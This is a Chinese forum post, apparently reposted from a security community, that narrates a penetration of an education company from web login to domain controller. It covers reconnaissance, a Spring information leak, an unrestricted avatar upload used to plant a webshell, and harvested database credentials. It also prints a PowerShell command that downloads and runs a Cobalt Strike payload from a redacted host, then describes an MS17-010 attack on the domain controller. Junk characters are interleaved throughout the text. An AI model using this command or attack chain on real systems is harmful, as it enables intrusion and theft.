|
% M* J; E/ M( o* O 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路4 l; [! {1 j+ k5 B m, C
$ I5 M0 m7 ~+ r/ D! |0 ?
" ~" s( z9 K/ O/ }2 G3 u, S! | - G1 U: h& l- G3 ~8 ~8 @
. B4 y U3 Y! X' p& y7 s
0 X7 O+ ]6 E1 Z* o* l 正文. W6 L0 S- D* v6 ~6 n; r) Q g
& j9 w; v" ^6 Z; _. a
, A- m8 v9 W0 V/ r+ u( Z6 U
; D m' ~9 B* H% P
" s# z5 {2 F8 Y/ L0 M2 h( r# Q1 X! X2 p! z, b( [0 c
目标:www.xxxx.com(一家教育机构)
" m& @. F' Z( m6 B% t( [# j
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能% S/ ^; Y5 l8 T' x' `! c$ n
3 q6 k* y# x# F) l1 g
. B/ b1 u9 W3 @: U* ] e# e5 m( v$ D
. l) o" G0 `. G" ^$ S7 r
1 R% V0 y/ n; q5 c, ~% K$ `: E) A8 p9 O x% ^) f! p) n
进行了简单的信息搜集
: B' K6 y! p6 Z) Q/ U
/ M5 S3 c( B. `; W8 x$ l9 x* f$ S
1 _2 c+ ~6 d7 S8 q
! A- g7 k C5 V
$ c! S- C: P: U' u& l) t& i# R 子域名搜集
8 I5 ~- F) i1 V8 \+ }3 s: f ! m) ^' [/ m0 c& P, v) d
, i" A. F5 [5 [- [- M1 E 
& ^. T1 O3 V# J; {
9 C! I0 C, B; U, D% |5 t6 s4 ?7 K( K8 b3 P! [6 Q" e
fofa找资产
' [/ s, e7 Y$ V
, z$ o! r, S1 i) b5 `$ c
& G6 P; x7 v+ N' G ' @* Z% m- S2 t0 Z6 t
8 M9 S _# ^* p6 N7 P$ h* |  ; L( m9 |* z) C+ O
3 c) m5 K( u- Q
- u# O, b5 a/ w% l; n5 ~0 _ 一共七个资产。去重之后只有两个。
3 b3 A3 u: ^; I( o( s4 r* K
# I! M% L6 H% L9 Y' a2 I6 n' F2 p3 q+ a" ^. d$ [
( [, v4 |% m3 s: @; I
# J3 o5 o: m v1 c% l
目录探测
( l2 W0 {, _' X, D- P0 g 8 {) {2 t, i1 |- ]
2 o; N0 @5 J, } p+ r  . C' u, {# ]' n# Y; W$ f, u: B
' p) p! p6 s% S% T6 s7 `; S
; K0 b9 t6 b3 C+ V/ P- A5 q9 Q9 Z6 g 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
- `' a* `* X7 c! @
5 d3 j M, v- \ W5 J$ J' |
5 O3 w7 J0 g" b) q! m0 u/ h
1 w9 C, l3 }0 r6 H4 T: b! I$ p: X
我又尝试了通过修改返回包来绕过登录界面8 S) b0 Q- Y1 e
0 U7 T) x0 K! i$ d: G" w
# z4 U+ H6 `+ _0 ?* O6 F
 / @: @. m o* ]' r2 @' F9 f
, J6 n2 [! n: v# W: Z8 ^. r
; @2 t) V* z" s0 Z4 x
还是不行,尝试注入无果
" \0 W8 ]: m8 w! h) v
* ?" ?, G4 I3 u" [# @3 N+ G+ L
# Y, I9 L2 t# t' O0 n9 k/ P, w% Q 
, f6 z7 R; e- }9 D' z8 p 9 V" O3 z' f/ v' k/ z
% J* s2 v3 L z. T
不过我目录探测出了一处Spring信息泄露
/ |2 P7 V! h: C" ^, F/ K9 N
/ W# O0 {' U4 L/ @& f
; l) r' I+ g5 v, p" D 1 }7 X) H$ m1 i k, b, S& G
4 d3 t" R" j9 l$ D3 O% n7 p 
9 @& B1 Z" o1 z, ?+ e% A 6 `+ J' h4 d6 K7 r3 C& c
t- L( R2 Z4 T, g# K9 e 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 I, ]; N. @* p2 W, [; Z
$ D9 M% s/ v! {. A
9 S: m; {, J( H% p0 v. P# l7 a# V  ' Y/ ~7 [$ H" A+ O1 ?. R P0 D3 D
, [/ q) \" w! }8 N% t1 m- s# Z
2 y) p3 d: s1 \' n4 b 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。# m, j* ]+ T, D( T
4 u7 _$ W( _/ a5 n8 I/ e
% r( N9 M+ O/ ] z
# ^' l7 `5 \) R: ~7 @$ N) k T3 Y
+ i1 H: v9 T0 ^& X( q# \; t
, i) N3 Y7 m/ w% r1 }' {0 s% M 获取有些师傅到这一步就手机抓包电脑测了。: i) c0 S* |5 V) \
. ~" f; L7 `9 G2 h4 w
6 Q# W0 N0 a( Y1 x
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。% e0 l% C. P, B( T2 ^
& v x: p3 p, n* _- r/ c4 G4 ?6 V+ r- z
其中在一个公众号发现了小程序,可以进行注册。8 J$ T$ b& A' A1 j/ ]0 c9 H! \
5 g5 g. _+ G4 B: m4 s, {2 X7 I i5 {& a
9 D) O! m' p2 w2 E 看到了头像上传,尝试上传获取WebShell
1 B8 g; a2 o0 M% T4 P4 g3 d+ E / l( K4 K% A) p6 b J W
/ @- P D% x/ Z% |- d: k- t7 c
) q; }8 `! D ^ s4 H. W% x # h6 n2 w$ j1 K) |0 Y! t- F! R
' a, I, [2 L9 _- \) Q 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问' }& A o: P: l2 H
/ w. ^) V8 l: m
; I; i* b- b' _# P t( R 
, V7 q" I4 c5 G' `3 M# H' i3 m
) f( W4 {* N7 \( o; K5 e- P* H7 m0 l2 u! w8 t4 c! a
然后上了大马: ?+ N; l3 S* G/ D9 b3 ?: ]
) ~: |, c' m0 r: ^
. ^4 Z b8 E$ o+ P8 {( P 
+ ]/ f' q* x( a4 D% j& @ ! C" t' B, g$ l) b; x. E
' l0 o G. ]2 C5 Q
. _3 y' z! D' i6 C: m e0 z! K
$ |6 m9 ]. N/ S1 K+ G& a! a# `
& a2 x/ ~; E9 @& F/ G% ? 通过翻找文件发现数据库账号密码, m8 u% ]7 d2 V a! J: j
+ V) A( E$ x. I2 I7 F K4 `
" t$ ]: d( }" x8 ^) B$ W8 ~  # d" B$ o" R: j- T) u9 s# c
- n, @2 ?7 I, h5 |8 s, y/ w
- P @1 F$ I% _) S( G3 R --内网渗透
: h& ?# A3 X" d+ h& q- O- E 7 y1 |/ ~: U! U2 G$ U6 s/ e
- ~- P. H) ^& A% y# N
直接通过powershell执行 cs上线
" f$ A% B* O! Z4 p ' [& `" s6 ~" N5 K7 @
. ^6 V8 o5 Q/ e8 z4 b* |( P powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
5 W8 E6 u; ]: P/ o6 K& L) H& W - `! d( q5 `8 x
* j5 Z( D% l6 Y4 l3 D$ u  0 m' s3 k5 I8 ?" l+ L
, S. D$ x, _( J# m2 T) L% @" w
- T1 V% m p# x: `8 T. q 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
# d' f5 ~9 ?7 e$ y" p + m' S' i+ x: y
. Q+ p3 p) A8 A# K, E
 0 y ^; ^% i5 I
7 _% k9 B1 g% r" f
- s3 f0 ^* ?; N/ d- |) ]6 O
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
0 c& C [ i+ }! X4 {1 k# \
, L% O: i( ?4 k5 |1 Q7 h7 N
' e/ @3 O# C9 K8 P# b' J6 N8 J/ b; B0 F$ _+ i- @1 h
5 d! w" q- |4 i/ v
& ]/ q j7 V$ Z9 I 
" b8 _8 G& c) P! z+ @5 i + {; R9 t2 T6 R+ V$ I8 X
9 w+ `+ a6 `( f7 C
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
# p% B2 l2 Q% o. D, c9 N
1 |$ a8 R4 Q( `; H- L4 }7 r0 ]2 }
/ W) h: Y: |0 L. O7 L+ ~" \- h" I g0 z+ h5 z
\ d& C& j. e# p! [1 S: Y ( | r: y7 E% F( n
4 `) q1 U- }, V7 N' b7 @. n- W
- b0 H- J) G" |7 m: G. U! x
1 t; G; v P- ^( P( \0 p; y
: r7 z2 m$ D3 Q. V
( P* l9 d- Q6 \8 \, Y& c
' ^6 N! i5 F3 P' p* { G5 s) Y
# K2 q3 |: P8 \. z
( h, ?+ ?$ a" R" n- P8 M: M& S$ z2 h
& P1 N: `# H& Y) L 小结
5 s: S0 T! _4 e% \. l , J9 n! r% ~$ b# k
, D3 W3 I( w7 ^0 f/ A0 z
' v" c! h b' Z6 z c , U) Y. z( a& G
/ P' P, n: _1 S6 u
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
0 f" x' q$ ]4 s9 J6 G
" f" s- m7 r) b2 Y1 ~
+ @* Z' Y4 f: K& j$ j
( h, A% M( k% V6 f9 Y5 A: J + q4 u; _2 I( s& C E
0 A8 _5 z7 j; ^, c1 l9 s% V6 G, ~* [ - ; ]/ K( k U% D% e
- K* J. U+ S0 f: D
8 O* Z9 n L* S$ f" @, [: y - 4 ]1 l, J5 t8 j6 S$ ^) q
6 z6 |7 P8 N7 @" U+ f
~. A/ X1 o/ j' F, B' v' X4 r 5 ]" q% z* g+ a4 q/ ?5 J
0 ]" T- Q4 h. y6 ?. L. L/ P+ E
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
1 @. [# `6 G" S6 D 4 f8 `4 Y# ?6 k2 t
; S/ F: \/ G- c, T9 w' c + o' k+ k2 ~% ?8 J* n( A# Y5 c) Z
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对